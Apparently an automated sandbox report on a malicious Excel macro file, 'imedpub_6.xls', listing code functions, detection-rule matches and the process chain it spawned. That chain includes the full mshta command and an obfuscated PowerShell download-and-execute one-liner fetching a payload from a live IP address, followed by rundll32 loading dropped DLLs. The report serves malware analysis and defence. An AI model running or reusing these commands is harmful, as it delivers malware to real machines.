                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C205110_2_001C2051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C225110_2_001C2251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D0E5310_2_001D0E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D6C4910_2_001D6C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D907F10_2_001D907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DAE6D10_2_001DAE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DA66610_2_001DA666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C5E6010_2_001C5E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CEA9910_2_001CEA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CF09B10_2_001CF09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D188910_2_001D1889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CEE8110_2_001CEE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C70B310_2_001C70B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DDEDC10_2_001DDEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CE2CC10_2_001CE2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D66CA10_2_001D66CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D5CC410_2_001D5CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CB2C710_2_001CB2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CAEFB10_2_001CAEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DDCF710_2_001DDCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D9EEC10_2_001D9EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DA2E810_2_001DA2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C64E210_2_001C64E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C4EE310_2_001C4EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D851910_2_001D8519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D0B1910_2_001D0B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C971410_2_001C9714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D473C10_2_001D473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C8B3D10_2_001C8B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C773510_2_001C7735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E0F3310_2_001E0F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C6D2410_2_001C6D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DBB2310_2_001DBB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CA55F10_2_001CA55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DCB5B10_2_001DCB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D255010_2_001D2550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CB74D10_2_001CB74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C554810_2_001C5548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D894B10_2_001D894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C434610_2_001C4346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CCF4710_2_001CCF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CBB7E10_2_001CBB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C896910_2_001C8969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D176B10_2_001D176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C536110_2_001C5361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DE39510_2_001DE395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CE99110_2_001CE991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DD38910_2_001DD389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D4B8710_2_001D4B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C9B8310_2_001C9B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C51BB10_2_001C51BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E09B510_2_001E09B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C81B710_2_001C81B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D7BA610_2_001D7BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DC3A010_2_001DC3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C2BD910_2_001C2BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D7DD510_2_001D7DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D9BCF10_2_001D9BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C9DCF10_2_001C9DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CE5CF10_2_001CE5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D6DF810_2_001D6DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CDFF310_2_001CDFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DDBEA10_2_001DDBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D8BE310_2_001D8BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003600711_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1004105011_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003130F11_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100323E211_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003046011_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1004159211_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003E59F11_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003960C11_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100317E211_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10040B0E11_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031BB611_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10041C5611_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10036CB511_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1001CD1611_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10042D2111_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031FC211_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035F8FD11_2_0035F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035E99111_2_0035E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035AB8711_2_0035AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035901111_2_00359011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036000111_2_00360001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036907F11_2_0036907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0037005611_2_00370056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035205111_2_00352051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003570B311_2_003570B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003620BA11_2_003620BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035F09B11_2_0035F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036411611_2_00364116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003581B711_2_003581B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003551BB11_2_003551BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035225111_2_00352251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036A2E811_2_0036A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035B2C711_2_0035B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035E2CC11_2_0035E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035536111_2_00355361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035434611_2_00354346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036C3A011_2_0036C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003713AD11_2_003713AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036E39511_2_0036E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036D38911_2_0036D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036F43511_2_0036F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036044F11_2_0036044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003564E211_2_003564E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036851911_2_00368519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036255011_2_00362550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035A55F11_2_0035A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035554811_2_00355548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003695FA11_2_003695FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035E5CF11_2_0035E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036C63111_2_0036C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036860611_2_00368606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036A66611_2_0036A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035D6D811_2_0035D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003666CA11_2_003666CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035773511_2_00357735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036473C11_2_0036473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035971411_2_00359714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036176B11_2_0036176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035B74D11_2_0035B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035481611_2_00354816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036188911_2_00361889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035896911_2_00358969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036894B11_2_0036894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003709B511_2_003709B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003559F211_2_003559F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036AA3011_2_0036AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00351A5611_2_00351A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035EA9911_2_0035EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00358B3D11_2_00358B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036BB2311_2_0036BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00360B1911_2_00360B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035BB7E11_2_0035BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036CB5B11_2_0036CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00367BA611_2_00367BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00364B8711_2_00364B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00359B8311_2_00359B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00368BE311_2_00368BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036DBEA11_2_0036DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00352BD911_2_00352BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00369BCF11_2_00369BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00357C3711_2_00357C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00353C3C11_2_00353C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036AC3A11_2_0036AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00370C1411_2_00370C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00354C5D11_2_00354C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00366C4911_2_00366C49
Source: 4173.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\SysWOW64\rundll32.exe | Process Stats: CPU usage > 98%
Source: imedpub_6.xls | Macro extractor: Sheet name: REEEEEEEE
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_003BE249 DeleteService
Source: imedpub_6.xls, type: SAMPLE | Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\imedpub_6.xls, type: DROPPED | Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\SysWOW64\Fjmda\
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 100200FD appears 72 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 100359C1 appears 46 times
Source: imedpub_6.xls | OLE indicator, VBA macros: true
Source: imedpub_6.xls.0.dr | OLE indicator, VBA macros: true
Source: classification engine | Classification label: mal100.troj.expl.evad.winXLS@21/12@2/48
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: imedpub_6.xls | OLE indicator, Workbook stream: true
Source: imedpub_6.xls.0.dr | OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc
Source: imedpub_6.xls | ReversingLabs: Detection: 18%
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",bVGdzkK
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",ZDYuehCO
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",DllRegisterServer
                            Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE05F.tmp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                            Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                            Source: Window Recorder Window detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                            Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: >ystem.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdbgement.Automation.pdbBB source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: 4173.tmp.0.dr Initial sample: OLE indicators vbamacros = False
                            Source: C:\Windows\System32\mshta.exe Code function: 4_3_032F30CA push 8B4902ADh; iretd 4_3_032F30CF
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10032B7D push ecx; ret 9_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030DFF push ecx; ret 9_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10032B7D push ecx; ret 11_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030DFF push ecx; ret 11_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_1003D873
                            Source: JooSee.dll.6.dr Static PE information: real checksum: 0x8df98 should be: 0x94782
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll
                            Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg (copy)

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg:Zone.Identifier read attributes | delete
                            Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq:Zone.Identifier read attributes | delete
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100134F0 IsIconic,9_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,9_2_10018C9A
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100134F0 IsIconic,11_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,11_2_10018C9A
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exe TID: 2192 Thread sleep time: -240000s >= -30000s
                            Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_9-32094
                            Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_11-32094
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                            Source: powershell.exe, 00000006.00000002.672127760.00000000001D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,9_2_10030334
